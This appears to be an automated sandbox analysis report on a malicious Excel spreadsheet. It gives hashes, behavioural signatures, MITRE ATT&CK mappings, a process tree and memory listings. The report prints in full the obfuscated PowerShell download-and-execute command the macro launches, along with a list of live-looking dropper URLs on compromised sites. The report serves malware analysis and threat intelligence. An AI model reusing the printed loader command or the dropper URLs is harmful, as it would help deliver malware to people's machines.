Analysis

  • max time kernel
    101s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-01-2023 08:09

General

  • Target

    508be46ec5246b1d5ce1aaa4593c43c8.xls

  • Size

    438KB

  • MD5

    508be46ec5246b1d5ce1aaa4593c43c8

  • SHA1

    f597d8e1b22a35c77e296c95187e974a2ce3ba20

  • SHA256

    11ed21044757efeacdfb3e2b08f35c7ea473f0698b8455655dc115bf30be11db

  • SHA512

    af9768b260914561dcc9150ae1d14cd5c4ed6f09e85d21f3224a90cec802d9689f55ee0461564f5fda37ab564867dbd06c89214327cebba49c3c6f0f7eeb6e1a

  • SSDEEP

    12288:q947a/JjsLZjXYc7X0/aXCKli04OaZ1XAYThF0:gurYc7E/i004OS1ThF0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://wildmanwildfood.com/wp-admin/wxyadXKXFe/

exe.dropper

https://ashven.co.uk/wp-includes/UwBairqGXVb11tCu/

exe.dropper

https://aigenix.comartstudios.com/cgi-bin/ZZ8HCNr40H/

exe.dropper

https://fastonlineearn.com/wp-content/L/

exe.dropper

https://mbmscaffolding.co.uk/test/3j/

exe.dropper

https://ineslebuhan.com/wp-includes/7dLR8UB3RFfSHd4cZN/

exe.dropper

https://mccoygloballinks.com/cgi-bin/HvZWLrLljiRj2ck/

exe.dropper

http://lonaomer.com/wp-content/6G/

exe.dropper

https://tainformado.com.br/wp-content/0Ysot/

exe.dropper

https://nifdtb.in/wp-content/9uHo3GBgyIQ/

exe.dropper

https://sdn3sajen.stormapp.in/wp-admin/Xc6Z/

exe.dropper

https://narsanat.com/banner/TnIhz/

exe.dropper

https://vanessanascimento.com.br/auren-xbox/cDD2dfW/

exe.dropper

https://medvital.com.br/arquivos/q6ZjbPPoR7l/

exe.dropper

https://mcjalandhar.in/1950-kill/BMoLHJM4g/

exe.dropper

https://nuranabd.com/wp-content/BhYOZ2pJV5q/

exe.dropper

https://sdigitaltv.online/wp-admin/rpRCArrXjpoUXo/

exe.dropper

http://news.leta.com.vn/-/NQOY80o/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\508be46ec5246b1d5ce1aaa4593c43c8.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Windows\SysWOW64\wscript.exe
      wscript c:\programdata\etyockqw.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ghkid=('$MJXdfshDrfGZses4=\"https:dhjdhjwildmanwildfood.comdhjwp-admindhjwxyadXKXFedhjbouhttps:dhjdhjashven.co.ukdhjwp-includesdhjUwBairqGXVb11tCudhjbouhttps:dhjdhjaigenix.comartstudios.comdhjcgi-bindhjZZ8HCNr40Hdhjbouhttps:dhjdhjfastonlineearn.comdhjwp-contentdhjLdhjbouhttps:dhjdhjmbmscaffolding.co.ukdhjtestdhj3jdhjbouhttps:dhjdhjineslebuhan.comdhjwp-includesdhj7dLR8UB3RFfSHd4cZNdhjbouhttps:dhjdhjmccoygloballinks.comdhjcgi-bindhjHvZWLrLljiRj2ckdhjbouhttp:dhjdhjlonaomer.comdhjwp-contentdhj6Gdhjbouhttps:dhjdhjtainformado.com.brdhjwp-contentdhj0Ysotdhjbouhttps:dhjdhjnifdtb.indhjwp-contentdhj9uHo3GBgyIQdhjbouhttps:dhjdhjsdn3sajen.stormapp.indhjwp-admindhjXc6Zdhjbouhttps:dhjdhjnarsanat.comdhjbannerdhjTnIhzdhjbouhttps:dhjdhjvanessanascimento.com.brdhjauren-xboxdhjcDD2dfWdhjbouhttps:dhjdhjmedvital.com.brdhjarquivosdhjq6ZjbPPoR7ldhjbouhttps:dhjdhjmcjalandhar.indhj1950-killdhjBMoLHJM4gdhjbouhttps:dhjdhjnuranabd.comdhjwp-contentdhjBhYOZ2pJV5qdhjbouhttps:dhjdhjsdigitaltv.onlinedhjwp-admindhjrpRCArrXjpoUXodhjbouhttp:dhjdhjnews.leta.com.vndhj-dhjNQOY80odhj\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\priuwdogiuwdramiuwddatiuwda\irlkhkuw.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 32463){bReak;}}}').replace(\"dhj\",\"/\");iex $ghkid"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1328
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\regsvr32.exe /s c:\programdata\irlkhkuw.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • \??\c:\windows\syswow64\regsvr32.exe
          c:\windows\syswow64\regsvr32.exe /s c:\programdata\irlkhkuw.dll
          4⤵
            PID:672

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \??\c:\programdata\etyockqw.vbs
      Filesize

      2KB

      MD5

      a35f55cf91f2003615533b5be5948090

      SHA1

      b5b89075550e2592b69f4541cfbdf33dd8fbf175

      SHA256

      d297bdfe7fdf74ffe50cad7965843bb92cd55b44370e1b7b8ddb99cf7ab3af7c

      SHA512

      098097cd100b73f231b3c1bb3e8330a584b2b2742be8a27211ea9f9f7875c78b414341e626b5c071abc0589caf3a2ac80c99c79b952388cc96884fd33b397899

    • memory/672-118-0x0000000000000000-mapping.dmp
    • memory/1296-110-0x0000000000000000-mapping.dmp
    • memory/1328-113-0x0000000000000000-mapping.dmp
    • memory/1328-115-0x000000006B780000-0x000000006BD2B000-memory.dmp
      Filesize

      5.7MB

    • memory/1328-116-0x000000006B780000-0x000000006BD2B000-memory.dmp
      Filesize

      5.7MB

    • memory/1380-117-0x0000000000000000-mapping.dmp
    • memory/1532-82-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-61-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-58-0x0000000071F2D000-0x0000000071F38000-memory.dmp
      Filesize

      44KB

    • memory/1532-64-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-63-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-62-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-85-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-60-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-59-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-65-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-76-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-75-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-78-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-77-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-74-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-73-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-72-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-71-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-70-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-69-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-68-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-67-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-66-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-79-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-80-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-86-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-84-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-83-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-81-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-57-0x0000000075091000-0x0000000075093000-memory.dmp
      Filesize

      8KB

    • memory/1532-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1532-87-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-88-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-89-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-91-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-90-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-92-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-94-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-93-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-96-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-97-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-95-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-98-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-99-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-100-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-102-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-101-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-103-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-104-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-55-0x0000000070F41000-0x0000000070F43000-memory.dmp
      Filesize

      8KB

    • memory/1532-54-0x000000002F371000-0x000000002F374000-memory.dmp
      Filesize

      12KB

    • memory/1532-105-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-106-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-107-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-108-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-109-0x000000000055F000-0x0000000000563000-memory.dmp
      Filesize

      16KB

    • memory/1532-120-0x0000000071F2D000-0x0000000071F38000-memory.dmp
      Filesize

      44KB

    • memory/1532-121-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1532-122-0x0000000071F2D000-0x0000000071F38000-memory.dmp
      Filesize

      44KB